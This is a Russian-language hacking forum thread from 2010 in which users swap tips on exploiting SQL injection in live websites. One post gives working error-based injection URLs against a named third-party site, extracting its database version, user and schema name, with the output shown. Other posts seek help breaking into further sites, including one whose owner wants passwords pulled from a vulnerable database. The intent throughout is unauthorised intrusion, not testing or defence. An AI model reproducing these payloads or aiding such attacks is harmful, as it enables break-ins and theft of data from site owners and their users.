 |
|
18.05.2010, 01:00
|
|
Новичок
Регистрация: 05.05.2009
Сообщений: 16
С нами:
8957846
Репутация:
0
|
|
А если в конце не site.php?id=1, а viewforum.php?id=1 то можно найти sql injection? А то уже стока форумов просмотрел и везде кавычка не катит
|
|
|
18.05.2010, 01:00
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Spazz, форумы обычно стоят на проверенных движках, где подобные вещи уже отфильтрованы.
Подскажите, может, сталкивался кто: при подстановке кавычки выпадает стандартная ошибка. Дальше пишу union+select... - опять выпадает ошибка, даже если пишу +1-- (пробовал /*, вообще без окончания - без разницы).
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1--,20' at line 6
|
|
|
|
29.05.2010, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
По сути да, но что-то не крутится... вывод ошибки очень специфический...
|
|
|
|
29.05.2010, 01:00
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
С нами:
9509918
Репутация:
30
|
|
да
http://topgir.com.ua/?id=908 and 1=1
http://topgir.com.ua/?id=908 and 1=(select 1,2) --+ [ обработка ошибок просто мечта хакира : )))) ]
на вопрос ответ дан на 100% : ))))
Добавлено через 23 минуты
стало любопытно:
http://topgir.com.ua/?id=908 union select ExtractValue(1,concat(0x5C,(version()))),2,3,4,5,6--+
=>
5.1.32-log
http://topgir.com.ua/?id=908 union select ExtractValue(1,concat(0x5C,(user()))),2,3,4,5,6--+
=>
topgir@localhost
http://topgir.com.ua/?id=908 union select ExtractValue(1,concat(0x5C,(select schema_name FROM INFORMATION_SCHEMA.schemata limit 1,1)))--+
=>
topgir |
|
|
|
29.05.2010, 01:00
|
|
Познающий
Регистрация: 13.07.2009
Сообщений: 53
С нами:
8858486
Репутация:
12
|
|
|
|
|
|
31.05.2010, 01:00
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Zot - все есть, юзай SQLHelper.
Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
|
|
|
|
31.05.2010, 01:00
|
|
Участник форума
Регистрация: 07.07.2009
Сообщений: 231
С нами:
8867126
Репутация:
10
|
|
есть сайт с уязвимостью, не могу найти пароли, подозреваю, что их нет в базе данных, посмотрите, может удастся что-нибудь откопать. Вот сайт
Скрытый текст (вы должны быть авторизованы и иметь 1 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
|
|
|
|
01.06.2010, 01:00
|
|
Новичок
Регистрация: 31.03.2009
Сообщений: 28
С нами:
9008246
Репутация:
7
|
|
всем привет. помогите вот с этим разобратся.
Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
и на этом остановился. так как ни в одной цифре вывода на страницу нету. можно тут как то раскрутить? :hmcool:
|
|
|
|
04.06.2010, 01:00
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами:
8830468
Репутация:
0
|
|
Цитата:
Сообщение от oficeran
всем привет. помогите вот с этим разобратся.
*** скрытый текст ***
и на этом остановился. так как ни в одной цифре вывода на страницу нету. можно тут как то раскрутить? :hmcool:
Похоже на обычный blind.
Вот наткнулся на интересную скуль:
Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
На order+by выкидывает на главную страницу. При использовании union+select для определения столбцов - пока неверно, то получаю ошибку, а когда верно (столбцов всего 2 по ходу), то опять выкидывает на главную.
Дальше что-то не соображу, как крутить. Кто подскажет?
|
|
|
|
06.06.2010, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
2 wolf295214: скрипт для вывода инфы через limit:
code:
(c) Dr.Z3r0 [antichat.ru]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
